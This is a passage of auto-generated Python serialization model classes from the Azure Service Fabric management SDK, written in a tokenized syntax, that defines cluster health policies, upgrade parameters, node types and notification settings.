For example, to allow 10% of applications to be unhealthy, this value would be 10. The percentage represents the maximum tolerated percentage of applications that can be unhealthy before the cluster is considered in error. If the percentage is respected but there is at least one unhealthy application, the health is evaluated as Warning. This is calculated by dividing the number of unhealthy applications over the total number of application instances in the cluster, excluding applications of application types that are included in the ApplicationTypeHealthPolicyMap. The computation rounds up to tolerate one failure on small numbers of applications. Default percentage is zero. :type max_percent_unhealthy_applications: int :param application_health_policies: Defines the application health policy map used to evaluate the health of an application or one of its children entities. :type application_health_policies: dict[str, ~azure.mgmt.servicefabric.models.ApplicationHealthPolicy] """<line_sep>_validation={'max_percent_unhealthy_nodes':{'maximum':100 'minimum':0} 'max_percent_unhealthy_applications':{'maximum':100 'minimum':0} }<line_sep>_attribute_map={'max_percent_unhealthy_nodes':{'key':'maxPercentUnhealthyNodes' 'type':'int'} 'max_percent_unhealthy_applications':{'key':'maxPercentUnhealthyApplications' 'type':'int'} 'application_health_policies':{'key':'applicationHealthPolicies' 'type':'{ApplicationHealthPolicy}'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterHealthPolicy self).__init__(**kwargs)<line_sep>self.max_percent_unhealthy_nodes=kwargs.get('max_percent_unhealthy_nodes' 0)<line_sep>self.max_percent_unhealthy_applications=kwargs.get('max_percent_unhealthy_applications' 0)<line_sep>self.application_health_policies=kwargs.get('application_health_policies' <none>)<block_end><block_end><class_stmt>ClusterListResult(msrest.serialization.Model)<block_start>"""Cluster list results. 
:param value: :type value: list[~azure.mgmt.servicefabric.models.Cluster] :param next_link: The URL to use for getting the next set of results. :type next_link: str """<line_sep>_attribute_map={'value':{'key':'value' 'type':'[Cluster]'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterListResult self).__init__(**kwargs)<line_sep>self.value=kwargs.get('value' <none>)<line_sep>self.next_link=kwargs.get('next_link' <none>)<block_end><block_end><class_stmt>ClusterUpdateParameters(msrest.serialization.Model)<block_start>"""Cluster update request. :param tags: A set of tags. Cluster update parameters. :type tags: dict[str, str] :param add_on_features: The list of add-on features to enable in the cluster. :type add_on_features: list[str or ~azure.mgmt.servicefabric.models.AddOnFeatures] :param certificate: The certificate to use for securing the cluster. The certificate provided will be used for node to node security within the cluster, SSL certificate for cluster management endpoint and default admin client. :type certificate: ~azure.mgmt.servicefabric.models.CertificateDescription :param certificate_common_names: Describes a list of server certificates referenced by common name that are used to secure the cluster. :type certificate_common_names: ~azure.mgmt.servicefabric.models.ServerCertificateCommonNames :param client_certificate_common_names: The list of client certificates referenced by common name that are allowed to manage the cluster. This will overwrite the existing list. :type client_certificate_common_names: list[~azure.mgmt.servicefabric.models.ClientCertificateCommonName] :param client_certificate_thumbprints: The list of client certificates referenced by thumbprint that are allowed to manage the cluster. This will overwrite the existing list. 
:type client_certificate_thumbprints: list[~azure.mgmt.servicefabric.models.ClientCertificateThumbprint] :param cluster_code_version: The Service Fabric runtime version of the cluster. This property can only by set the user when **upgradeMode** is set to 'Manual'. To get list of available Service Fabric versions for new clusters use `ClusterVersion API <./ClusterVersion.md>`_. To get the list of available version for existing clusters use **availableClusterVersions**. :type cluster_code_version: str :param event_store_service_enabled: Indicates if the event store service is enabled. :type event_store_service_enabled: bool :param fabric_settings: The list of custom fabric settings to configure the cluster. This will overwrite the existing list. :type fabric_settings: list[~azure.mgmt.servicefabric.models.SettingsSectionDescription] :param node_types: The list of node types in the cluster. This will overwrite the existing list. :type node_types: list[~azure.mgmt.servicefabric.models.NodeTypeDescription] :param reliability_level: The reliability level sets the replica set size of system services. Learn about `ReliabilityLevel <https://docs.microsoft.com/azure/service-fabric/service-fabric-cluster-capacity>`_. * None - Run the System services with a target replica set count of 1. This should only be used for test clusters. * Bronze - Run the System services with a target replica set count of 3. This should only be used for test clusters. * Silver - Run the System services with a target replica set count of 5. * Gold - Run the System services with a target replica set count of 7. * Platinum - Run the System services with a target replica set count of 9. Possible values include: "None", "Bronze", "Silver", "Gold", "Platinum". :type reliability_level: str or ~azure.mgmt.servicefabric.models.ReliabilityLevel :param reverse_proxy_certificate: The server certificate used by reverse proxy. 
:type reverse_proxy_certificate: ~azure.mgmt.servicefabric.models.CertificateDescription :param upgrade_description: The policy to use when upgrading the cluster. :type upgrade_description: ~azure.mgmt.servicefabric.models.ClusterUpgradePolicy :param application_type_versions_cleanup_policy: The policy used to clean up unused versions. :type application_type_versions_cleanup_policy: ~azure.mgmt.servicefabric.models.ApplicationTypeVersionsCleanupPolicy :param upgrade_mode: The upgrade mode of the cluster when new Service Fabric runtime version is available. Possible values include: "Automatic", "Manual". Default value: "Automatic". :type upgrade_mode: str or ~azure.mgmt.servicefabric.models.UpgradeMode :param sf_zonal_upgrade_mode: This property controls the logical grouping of VMs in upgrade domains (UDs). This property can't be modified if a node type with multiple Availability Zones is already present in the cluster. Possible values include: "Parallel", "Hierarchical". :type sf_zonal_upgrade_mode: str or ~azure.mgmt.servicefabric.models.SfZonalUpgradeMode :param vmss_zonal_upgrade_mode: This property defines the upgrade mode for the virtual machine scale set, it is mandatory if a node type with multiple Availability Zones is added. Possible values include: "Parallel", "Hierarchical". :type vmss_zonal_upgrade_mode: str or ~azure.mgmt.servicefabric.models.VmssZonalUpgradeMode :param infrastructure_service_manager: Indicates if infrastructure service manager is enabled. :type infrastructure_service_manager: bool :param upgrade_wave: Indicates when new cluster runtime version upgrades will be applied after they are released. By default is Wave0. Only applies when **upgradeMode** is set to 'Automatic'. Possible values include: "Wave0", "Wave1", "Wave2". :type upgrade_wave: str or ~azure.mgmt.servicefabric.models.ClusterUpgradeCadence :param upgrade_pause_start_timestamp_utc: The start timestamp to pause runtime version upgrades on the cluster (UTC). 
:type upgrade_pause_start_timestamp_utc: ~datetime.datetime :param upgrade_pause_end_timestamp_utc: The end timestamp of pause runtime version upgrades on the cluster (UTC). :type upgrade_pause_end_timestamp_utc: ~datetime.datetime :param wave_upgrade_paused: Boolean to pause automatic runtime version upgrades to the cluster. :type wave_upgrade_paused: bool :param notifications: Indicates a list of notification channels for cluster events. :type notifications: list[~azure.mgmt.servicefabric.models.Notification] """<line_sep>_attribute_map={'tags':{'key':'tags' 'type':'{str}'} 'add_on_features':{'key':'properties.addOnFeatures' 'type':'[str]'} 'certificate':{'key':'properties.certificate' 'type':'CertificateDescription'} 'certificate_common_names':{'key':'properties.certificateCommonNames' 'type':'ServerCertificateCommonNames'} 'client_certificate_common_names':{'key':'properties.clientCertificateCommonNames' 'type':'[ClientCertificateCommonName]'} 'client_certificate_thumbprints':{'key':'properties.clientCertificateThumbprints' 'type':'[ClientCertificateThumbprint]'} 'cluster_code_version':{'key':'properties.clusterCodeVersion' 'type':'str'} 'event_store_service_enabled':{'key':'properties.eventStoreServiceEnabled' 'type':'bool'} 'fabric_settings':{'key':'properties.fabricSettings' 'type':'[SettingsSectionDescription]'} 'node_types':{'key':'properties.nodeTypes' 'type':'[NodeTypeDescription]'} 'reliability_level':{'key':'properties.reliabilityLevel' 'type':'str'} 'reverse_proxy_certificate':{'key':'properties.reverseProxyCertificate' 'type':'CertificateDescription'} 'upgrade_description':{'key':'properties.upgradeDescription' 'type':'ClusterUpgradePolicy'} 'application_type_versions_cleanup_policy':{'key':'properties.applicationTypeVersionsCleanupPolicy' 'type':'ApplicationTypeVersionsCleanupPolicy'} 'upgrade_mode':{'key':'properties.upgradeMode' 'type':'str'} 'sf_zonal_upgrade_mode':{'key':'properties.sfZonalUpgradeMode' 'type':'str'} 
'vmss_zonal_upgrade_mode':{'key':'properties.vmssZonalUpgradeMode' 'type':'str'} 'infrastructure_service_manager':{'key':'properties.infrastructureServiceManager' 'type':'bool'} 'upgrade_wave':{'key':'properties.upgradeWave' 'type':'str'} 'upgrade_pause_start_timestamp_utc':{'key':'properties.upgradePauseStartTimestampUtc' 'type':'iso-8601'} 'upgrade_pause_end_timestamp_utc':{'key':'properties.upgradePauseEndTimestampUtc' 'type':'iso-8601'} 'wave_upgrade_paused':{'key':'properties.waveUpgradePaused' 'type':'bool'} 'notifications':{'key':'properties.notifications' 'type':'[Notification]'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterUpdateParameters self).__init__(**kwargs)<line_sep>self.tags=kwargs.get('tags' <none>)<line_sep>self.add_on_features=kwargs.get('add_on_features' <none>)<line_sep>self.certificate=kwargs.get('certificate' <none>)<line_sep>self.certificate_common_names=kwargs.get('certificate_common_names' <none>)<line_sep>self.client_certificate_common_names=kwargs.get('client_certificate_common_names' <none>)<line_sep>self.client_certificate_thumbprints=kwargs.get('client_certificate_thumbprints' <none>)<line_sep>self.cluster_code_version=kwargs.get('cluster_code_version' <none>)<line_sep>self.event_store_service_enabled=kwargs.get('event_store_service_enabled' <none>)<line_sep>self.fabric_settings=kwargs.get('fabric_settings' <none>)<line_sep>self.node_types=kwargs.get('node_types' <none>)<line_sep>self.reliability_level=kwargs.get('reliability_level' <none>)<line_sep>self.reverse_proxy_certificate=kwargs.get('reverse_proxy_certificate' <none>)<line_sep>self.upgrade_description=kwargs.get('upgrade_description' <none>)<line_sep>self.application_type_versions_cleanup_policy=kwargs.get('application_type_versions_cleanup_policy' <none>)<line_sep>self.upgrade_mode=kwargs.get('upgrade_mode' "Automatic")<line_sep>self.sf_zonal_upgrade_mode=kwargs.get('sf_zonal_upgrade_mode' 
<none>)<line_sep>self.vmss_zonal_upgrade_mode=kwargs.get('vmss_zonal_upgrade_mode' <none>)<line_sep>self.infrastructure_service_manager=kwargs.get('infrastructure_service_manager' <none>)<line_sep>self.upgrade_wave=kwargs.get('upgrade_wave' <none>)<line_sep>self.upgrade_pause_start_timestamp_utc=kwargs.get('upgrade_pause_start_timestamp_utc' <none>)<line_sep>self.upgrade_pause_end_timestamp_utc=kwargs.get('upgrade_pause_end_timestamp_utc' <none>)<line_sep>self.wave_upgrade_paused=kwargs.get('wave_upgrade_paused' <none>)<line_sep>self.notifications=kwargs.get('notifications' <none>)<block_end><block_end><class_stmt>ClusterUpgradeDeltaHealthPolicy(msrest.serialization.Model)<block_start>"""Describes the delta health policies for the cluster upgrade. All required parameters must be populated in order to send to Azure. :param max_percent_delta_unhealthy_nodes: Required. The maximum allowed percentage of nodes health degradation allowed during cluster upgrades. The delta is measured between the state of the nodes at the beginning of upgrade and the state of the nodes at the time of the health evaluation. The check is performed after every upgrade domain upgrade completion to make sure the global state of the cluster is within tolerated limits. :type max_percent_delta_unhealthy_nodes: int :param max_percent_upgrade_domain_delta_unhealthy_nodes: Required. The maximum allowed percentage of upgrade domain nodes health degradation allowed during cluster upgrades. The delta is measured between the state of the upgrade domain nodes at the beginning of upgrade and the state of the upgrade domain nodes at the time of the health evaluation. The check is performed after every upgrade domain upgrade completion for all completed upgrade domains to make sure the state of the upgrade domains is within tolerated limits. :type max_percent_upgrade_domain_delta_unhealthy_nodes: int :param max_percent_delta_unhealthy_applications: Required. 
The maximum allowed percentage of applications health degradation allowed during cluster upgrades. The delta is measured between the state of the applications at the beginning of upgrade and the state of the applications at the time of the health evaluation. The check is performed after every upgrade domain upgrade completion to make sure the global state of the cluster is within tolerated limits. System services are not included in this. :type max_percent_delta_unhealthy_applications: int :param application_delta_health_policies: Defines the application delta health policy map used to evaluate the health of an application or one of its child entities when upgrading the cluster. :type application_delta_health_policies: dict[str, ~azure.mgmt.servicefabric.models.ApplicationDeltaHealthPolicy] """<line_sep>_validation={'max_percent_delta_unhealthy_nodes':{'required':<true> 'maximum':100 'minimum':0} 'max_percent_upgrade_domain_delta_unhealthy_nodes':{'required':<true> 'maximum':100 'minimum':0} 'max_percent_delta_unhealthy_applications':{'required':<true> 'maximum':100 'minimum':0} }<line_sep>_attribute_map={'max_percent_delta_unhealthy_nodes':{'key':'maxPercentDeltaUnhealthyNodes' 'type':'int'} 'max_percent_upgrade_domain_delta_unhealthy_nodes':{'key':'maxPercentUpgradeDomainDeltaUnhealthyNodes' 'type':'int'} 'max_percent_delta_unhealthy_applications':{'key':'maxPercentDeltaUnhealthyApplications' 'type':'int'} 'application_delta_health_policies':{'key':'applicationDeltaHealthPolicies' 'type':'{ApplicationDeltaHealthPolicy}'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterUpgradeDeltaHealthPolicy 
self).__init__(**kwargs)<line_sep>self.max_percent_delta_unhealthy_nodes=kwargs['max_percent_delta_unhealthy_nodes']<line_sep>self.max_percent_upgrade_domain_delta_unhealthy_nodes=kwargs['max_percent_upgrade_domain_delta_unhealthy_nodes']<line_sep>self.max_percent_delta_unhealthy_applications=kwargs['max_percent_delta_unhealthy_applications']<line_sep>self.application_delta_health_policies=kwargs.get('application_delta_health_policies' <none>)<block_end><block_end><class_stmt>ClusterUpgradePolicy(msrest.serialization.Model)<block_start>"""Describes the policy used when upgrading the cluster. All required parameters must be populated in order to send to Azure. :param force_restart: If true, then processes are forcefully restarted during upgrade even when the code version has not changed (the upgrade only changes configuration or data). :type force_restart: bool :param upgrade_replica_set_check_timeout: Required. The maximum amount of time to block processing of an upgrade domain and prevent loss of availability when there are unexpected issues. When this timeout expires, processing of the upgrade domain will proceed regardless of availability loss issues. The timeout is reset at the start of each upgrade domain. The timeout can be in either hh:mm:ss or in d.hh:mm:ss.ms format. :type upgrade_replica_set_check_timeout: str :param health_check_wait_duration: Required. The length of time to wait after completing an upgrade domain before performing health checks. The duration can be in either hh:mm:ss or in d.hh:mm:ss.ms format. :type health_check_wait_duration: str :param health_check_stable_duration: Required. The amount of time that the application or cluster must remain healthy before the upgrade proceeds to the next upgrade domain. The duration can be in either hh:mm:ss or in d.hh:mm:ss.ms format. :type health_check_stable_duration: str :param health_check_retry_timeout: Required. 
The amount of time to retry health evaluation when the application or cluster is unhealthy before the upgrade rolls back. The timeout can be in either hh:mm:ss or in d.hh:mm:ss.ms format. :type health_check_retry_timeout: str :param upgrade_timeout: Required. The amount of time the overall upgrade has to complete before the upgrade rolls back. The timeout can be in either hh:mm:ss or in d.hh:mm:ss.ms format. :type upgrade_timeout: str :param upgrade_domain_timeout: Required. The amount of time each upgrade domain has to complete before the upgrade rolls back. The timeout can be in either hh:mm:ss or in d.hh:mm:ss.ms format. :type upgrade_domain_timeout: str :param health_policy: Required. The cluster health policy used when upgrading the cluster. :type health_policy: ~azure.mgmt.servicefabric.models.ClusterHealthPolicy :param delta_health_policy: The cluster delta health policy used when upgrading the cluster. :type delta_health_policy: ~azure.mgmt.servicefabric.models.ClusterUpgradeDeltaHealthPolicy """<line_sep>_validation={'upgrade_replica_set_check_timeout':{'required':<true>} 'health_check_wait_duration':{'required':<true>} 'health_check_stable_duration':{'required':<true>} 'health_check_retry_timeout':{'required':<true>} 'upgrade_timeout':{'required':<true>} 'upgrade_domain_timeout':{'required':<true>} 'health_policy':{'required':<true>} }<line_sep>_attribute_map={'force_restart':{'key':'forceRestart' 'type':'bool'} 'upgrade_replica_set_check_timeout':{'key':'upgradeReplicaSetCheckTimeout' 'type':'str'} 'health_check_wait_duration':{'key':'healthCheckWaitDuration' 'type':'str'} 'health_check_stable_duration':{'key':'healthCheckStableDuration' 'type':'str'} 'health_check_retry_timeout':{'key':'healthCheckRetryTimeout' 'type':'str'} 'upgrade_timeout':{'key':'upgradeTimeout' 'type':'str'} 'upgrade_domain_timeout':{'key':'upgradeDomainTimeout' 'type':'str'} 'health_policy':{'key':'healthPolicy' 'type':'ClusterHealthPolicy'} 
'delta_health_policy':{'key':'deltaHealthPolicy' 'type':'ClusterUpgradeDeltaHealthPolicy'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterUpgradePolicy self).__init__(**kwargs)<line_sep>self.force_restart=kwargs.get('force_restart' <none>)<line_sep>self.upgrade_replica_set_check_timeout=kwargs['upgrade_replica_set_check_timeout']<line_sep>self.health_check_wait_duration=kwargs['health_check_wait_duration']<line_sep>self.health_check_stable_duration=kwargs['health_check_stable_duration']<line_sep>self.health_check_retry_timeout=kwargs['health_check_retry_timeout']<line_sep>self.upgrade_timeout=kwargs['upgrade_timeout']<line_sep>self.upgrade_domain_timeout=kwargs['upgrade_domain_timeout']<line_sep>self.health_policy=kwargs['health_policy']<line_sep>self.delta_health_policy=kwargs.get('delta_health_policy' <none>)<block_end><block_end><class_stmt>ClusterVersionDetails(msrest.serialization.Model)<block_start>"""The detail of the Service Fabric runtime version result. :param code_version: The Service Fabric runtime version of the cluster. :type code_version: str :param support_expiry_utc: The date of expiry of support of the version. :type support_expiry_utc: str :param environment: Indicates if this version is for Windows or Linux operating system. Possible values include: "Windows", "Linux". 
:type environment: str or ~azure.mgmt.servicefabric.models.ClusterEnvironment """<line_sep>_attribute_map={'code_version':{'key':'codeVersion' 'type':'str'} 'support_expiry_utc':{'key':'supportExpiryUtc' 'type':'str'} 'environment':{'key':'environment' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterVersionDetails self).__init__(**kwargs)<line_sep>self.code_version=kwargs.get('code_version' <none>)<line_sep>self.support_expiry_utc=kwargs.get('support_expiry_utc' <none>)<line_sep>self.environment=kwargs.get('environment' <none>)<block_end><block_end><class_stmt>DiagnosticsStorageAccountConfig(msrest.serialization.Model)<block_start>"""The storage account information for storing Service Fabric diagnostic logs. All required parameters must be populated in order to send to Azure. :param storage_account_name: Required. The Azure storage account name. :type storage_account_name: str :param protected_account_key_name: Required. The protected diagnostics storage key name. :type protected_account_key_name: str :param protected_account_key_name2: The secondary protected diagnostics storage key name. If one of the storage account keys is rotated the cluster will fallback to using the other. :type protected_account_key_name2: str :param blob_endpoint: Required. The blob endpoint of the azure storage account. :type blob_endpoint: str :param queue_endpoint: Required. The queue endpoint of the azure storage account. :type queue_endpoint: str :param table_endpoint: Required. The table endpoint of the azure storage account. 
:type table_endpoint: str """<line_sep>_validation={'storage_account_name':{'required':<true>} 'protected_account_key_name':{'required':<true>} 'blob_endpoint':{'required':<true>} 'queue_endpoint':{'required':<true>} 'table_endpoint':{'required':<true>} }<line_sep>_attribute_map={'storage_account_name':{'key':'storageAccountName' 'type':'str'} 'protected_account_key_name':{'key':'protectedAccountKeyName' 'type':'str'} 'protected_account_key_name2':{'key':'protectedAccountKeyName2' 'type':'str'} 'blob_endpoint':{'key':'blobEndpoint' 'type':'str'} 'queue_endpoint':{'key':'queueEndpoint' 'type':'str'} 'table_endpoint':{'key':'tableEndpoint' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(DiagnosticsStorageAccountConfig self).__init__(**kwargs)<line_sep>self.storage_account_name=kwargs['storage_account_name']<line_sep>self.protected_account_key_name=kwargs['protected_account_key_name']<line_sep>self.protected_account_key_name2=kwargs.get('protected_account_key_name2' <none>)<line_sep>self.blob_endpoint=kwargs['blob_endpoint']<line_sep>self.queue_endpoint=kwargs['queue_endpoint']<line_sep>self.table_endpoint=kwargs['table_endpoint']<block_end><block_end><class_stmt>EndpointRangeDescription(msrest.serialization.Model)<block_start>"""Port range details. All required parameters must be populated in order to send to Azure. :param start_port: Required. Starting port of a range of ports. :type start_port: int :param end_port: Required. End port of a range of ports. 
:type end_port: int """<line_sep>_validation={'start_port':{'required':<true>} 'end_port':{'required':<true>} }<line_sep>_attribute_map={'start_port':{'key':'startPort' 'type':'int'} 'end_port':{'key':'endPort' 'type':'int'} }<def_stmt>__init__ self **kwargs<block_start>super(EndpointRangeDescription self).__init__(**kwargs)<line_sep>self.start_port=kwargs['start_port']<line_sep>self.end_port=kwargs['end_port']<block_end><block_end><class_stmt>ErrorModel(msrest.serialization.Model)<block_start>"""The structure of the error. :param error: The error details. :type error: ~azure.mgmt.servicefabric.models.ErrorModelError """<line_sep>_attribute_map={'error':{'key':'error' 'type':'ErrorModelError'} }<def_stmt>__init__ self **kwargs<block_start>super(ErrorModel self).__init__(**kwargs)<line_sep>self.error=kwargs.get('error' <none>)<block_end><block_end><class_stmt>ErrorModelError(msrest.serialization.Model)<block_start>"""The error details. :param code: The error code. :type code: str :param message: The error message. :type message: str """<line_sep>_attribute_map={'code':{'key':'code' 'type':'str'} 'message':{'key':'message' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ErrorModelError self).__init__(**kwargs)<line_sep>self.code=kwargs.get('code' <none>)<line_sep>self.message=kwargs.get('message' <none>)<block_end><block_end><class_stmt>ManagedIdentity(msrest.serialization.Model)<block_start>"""Describes the managed identities for an Azure resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar principal_id: The principal id of the managed identity. This property will only be provided for a system assigned identity. :vartype principal_id: str :ivar tenant_id: The tenant id of the managed identity. This property will only be provided for a system assigned identity. :vartype tenant_id: str :param type: The type of managed identity for the resource. 
Possible values include: "SystemAssigned", "UserAssigned", "SystemAssigned, UserAssigned", "None". :type type: str or ~azure.mgmt.servicefabric.models.ManagedIdentityType :param user_assigned_identities: The list of user identities associated with the resource. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'. :type user_assigned_identities: dict[str, ~azure.mgmt.servicefabric.models.UserAssignedIdentity] """<line_sep>_validation={'principal_id':{'readonly':<true>} 'tenant_id':{'readonly':<true>} }<line_sep>_attribute_map={'principal_id':{'key':'principalId' 'type':'str'} 'tenant_id':{'key':'tenantId' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'user_assigned_identities':{'key':'userAssignedIdentities' 'type':'{UserAssignedIdentity}'} }<def_stmt>__init__ self **kwargs<block_start>super(ManagedIdentity self).__init__(**kwargs)<line_sep>self.principal_id=<none><line_sep>self.tenant_id=<none><line_sep>self.type=kwargs.get('type' <none>)<line_sep>self.user_assigned_identities=kwargs.get('user_assigned_identities' <none>)<block_end><block_end><class_stmt>PartitionSchemeDescription(msrest.serialization.Model)<block_start>"""Describes how the service is partitioned. You probably want to use the sub-classes and not this class directly. Known sub-classes are: NamedPartitionSchemeDescription, SingletonPartitionSchemeDescription, UniformInt64RangePartitionSchemeDescription. All required parameters must be populated in order to send to Azure. :param partition_scheme: Required. Specifies how the service is partitioned.Constant filled by server. Possible values include: "Invalid", "Singleton", "UniformInt64Range", "Named". 
:type partition_scheme: str or ~azure.mgmt.servicefabric.models.PartitionScheme """<line_sep>_validation={'partition_scheme':{'required':<true>} }<line_sep>_attribute_map={'partition_scheme':{'key':'partitionScheme' 'type':'str'} }<line_sep>_subtype_map={'partition_scheme':{'Named':'NamedPartitionSchemeDescription' 'Singleton':'SingletonPartitionSchemeDescription' 'UniformInt64Range':'UniformInt64RangePartitionSchemeDescription'}}<def_stmt>__init__ self **kwargs<block_start>super(PartitionSchemeDescription self).__init__(**kwargs)<line_sep>self.partition_scheme=<none><block_end><block_end># type: Optional[str] <class_stmt>NamedPartitionSchemeDescription(PartitionSchemeDescription)<block_start>"""Describes the named partition scheme of the service. All required parameters must be populated in order to send to Azure. :param partition_scheme: Required. Specifies how the service is partitioned.Constant filled by server. Possible values include: "Invalid", "Singleton", "UniformInt64Range", "Named". :type partition_scheme: str or ~azure.mgmt.servicefabric.models.PartitionScheme :param count: Required. The number of partitions. :type count: int :param names: Required. Array of size specified by the ‘count’ parameter, for the names of the partitions. :type names: list[str] """<line_sep>_validation={'partition_scheme':{'required':<true>} 'count':{'required':<true>} 'names':{'required':<true>} }<line_sep>_attribute_map={'partition_scheme':{'key':'partitionScheme' 'type':'str'} 'count':{'key':'count' 'type':'int'} 'names':{'key':'names' 'type':'[str]'} }<def_stmt>__init__ self **kwargs<block_start>super(NamedPartitionSchemeDescription self).__init__(**kwargs)<line_sep>self.partition_scheme='Named'# type: str self.count=kwargs['count']<line_sep>self.names=kwargs['names']<block_end><block_end><class_stmt>NodeTypeDescription(msrest.serialization.Model)<block_start>"""Describes a node type in the cluster, each node type represents sub set of nodes in the cluster. 
All required parameters must be populated in order to send to Azure. :param name: Required. The name of the node type. :type name: str :param placement_properties: The placement tags applied to nodes in the node type, which can be used to indicate where certain services (workload) should run. :type placement_properties: dict[str, str] :param capacities: The capacity tags applied to the nodes in the node type, the cluster resource manager uses these tags to understand how much resource a node has. :type capacities: dict[str, str] :param client_connection_endpoint_port: Required. The TCP cluster management endpoint port. :type client_connection_endpoint_port: int :param http_gateway_endpoint_port: Required. The HTTP cluster management endpoint port. :type http_gateway_endpoint_port: int :param durability_level: The durability level of the node type. Learn about `DurabilityLevel <https://docs.microsoft.com/azure/service-fabric/service-fabric-cluster-capacity>`_. * Bronze - No privileges. This is the default. * Silver - The infrastructure jobs can be paused for a duration of 10 minutes per UD. * Gold - The infrastructure jobs can be paused for a duration of 2 hours per UD. Gold durability can be enabled only on full node VM skus like D15_V2, G5 etc. Possible values include: "Bronze", "Silver", "Gold". :type durability_level: str or ~azure.mgmt.servicefabric.models.DurabilityLevel :param application_ports: The range of ports from which cluster assigned port to Service Fabric applications. :type application_ports: ~azure.mgmt.servicefabric.models.EndpointRangeDescription :param ephemeral_ports: The range of ephemeral ports that nodes in this node type should be configured with. :type ephemeral_ports: ~azure.mgmt.servicefabric.models.EndpointRangeDescription :param is_primary: Required. The node type on which system services will run. Only one node type should be marked as primary. Primary node type cannot be deleted or changed for existing clusters. 
:type is_primary: bool :param vm_instance_count: Required. VMInstanceCount should be 1 to n, where n indicates the number of VM instances corresponding to this nodeType. VMInstanceCount = 0 can be done only in these scenarios: NodeType is a secondary nodeType. Durability = Bronze or Durability >= Bronze and InfrastructureServiceManager = true. If VMInstanceCount = 0, implies the VMs for this nodeType will not be used for the initial cluster size computation. :type vm_instance_count: int :param reverse_proxy_endpoint_port: The endpoint used by reverse proxy. :type reverse_proxy_endpoint_port: int :param is_stateless: Indicates if the node type can only host Stateless workloads. :type is_stateless: bool :param multiple_availability_zones: Indicates if the node type is enabled to support multiple zones. :type multiple_availability_zones: bool """<line_sep>_validation={'name':{'required':<true>} 'client_connection_endpoint_port':{'required':<true>} 'http_gateway_endpoint_port':{'required':<true>} 'is_primary':{'required':<true>} 'vm_instance_count':{'required':<true> 'maximum':2147483647 'minimum':0} }<line_sep>_attribute_map={'name':{'key':'name' 'type':'str'} 'placement_properties':{'key':'placementProperties' 'type':'{str}'} 'capacities':{'key':'capacities' 'type':'{str}'} 'client_connection_endpoint_port':{'key':'clientConnectionEndpointPort' 'type':'int'} 'http_gateway_endpoint_port':{'key':'httpGatewayEndpointPort' 'type':'int'} 'durability_level':{'key':'durabilityLevel' 'type':'str'} 'application_ports':{'key':'applicationPorts' 'type':'EndpointRangeDescription'} 'ephemeral_ports':{'key':'ephemeralPorts' 'type':'EndpointRangeDescription'} 'is_primary':{'key':'isPrimary' 'type':'bool'} 'vm_instance_count':{'key':'vmInstanceCount' 'type':'int'} 'reverse_proxy_endpoint_port':{'key':'reverseProxyEndpointPort' 'type':'int'} 'is_stateless':{'key':'isStateless' 'type':'bool'} 'multiple_availability_zones':{'key':'multipleAvailabilityZones' 'type':'bool'} 
}<def_stmt>__init__ self **kwargs<block_start>super(NodeTypeDescription self).__init__(**kwargs)<line_sep>self.name=kwargs['name']<line_sep>self.placement_properties=kwargs.get('placement_properties' <none>)<line_sep>self.capacities=kwargs.get('capacities' <none>)<line_sep>self.client_connection_endpoint_port=kwargs['client_connection_endpoint_port']<line_sep>self.http_gateway_endpoint_port=kwargs['http_gateway_endpoint_port']<line_sep>self.durability_level=kwargs.get('durability_level' <none>)<line_sep>self.application_ports=kwargs.get('application_ports' <none>)<line_sep>self.ephemeral_ports=kwargs.get('ephemeral_ports' <none>)<line_sep>self.is_primary=kwargs['is_primary']<line_sep>self.vm_instance_count=kwargs['vm_instance_count']<line_sep>self.reverse_proxy_endpoint_port=kwargs.get('reverse_proxy_endpoint_port' <none>)<line_sep>self.is_stateless=kwargs.get('is_stateless' <none>)<line_sep>self.multiple_availability_zones=kwargs.get('multiple_availability_zones' <none>)<block_end><block_end><class_stmt>Notification(msrest.serialization.Model)<block_start>"""Describes the notification channel for cluster events. All required parameters must be populated in order to send to Azure. :param is_enabled: Required. Indicates if the notification is enabled. :type is_enabled: bool :param notification_category: Required. The category of notification. Possible values include: "WaveProgress". :type notification_category: str or ~azure.mgmt.servicefabric.models.NotificationCategory :param notification_level: Required. The level of notification. Possible values include: "Critical", "All". :type notification_level: str or ~azure.mgmt.servicefabric.models.NotificationLevel :param notification_targets: Required. List of targets that subscribe to the notification. 
:type notification_targets: list[~azure.mgmt.servicefabric.models.NotificationTarget] """<line_sep>_validation={'is_enabled':{'required':<true>} 'notification_category':{'required':<true>} 'notification_level':{'required':<true>} 'notification_targets':{'required':<true>} }<line_sep>_attribute_map={'is_enabled':{'key':'isEnabled' 'type':'bool'} 'notification_category':{'key':'notificationCategory' 'type':'str'} 'notification_level':{'key':'notificationLevel' 'type':'str'} 'notification_targets':{'key':'notificationTargets' 'type':'[NotificationTarget]'} }<def_stmt>__init__ self **kwargs<block_start>super(Notification self).__init__(**kwargs)<line_sep>self.is_enabled=kwargs['is_enabled']<line_sep>self.notification_category=kwargs['notification_category']<line_sep>self.notification_level=kwargs['notification_level']<line_sep>self.notification_targets=kwargs['notification_targets']<block_end><block_end><class_stmt>NotificationTarget(msrest.serialization.Model)<block_start>"""Describes the notification target properties. All required parameters must be populated in order to send to Azure. :param notification_channel: Required. The notification channel indicates the type of receivers subscribed to the notification, either user or subscription. Possible values include: "EmailUser", "EmailSubscription". :type notification_channel: str or ~azure.mgmt.servicefabric.models.NotificationChannel :param receivers: Required. List of targets that subscribe to the notification. 
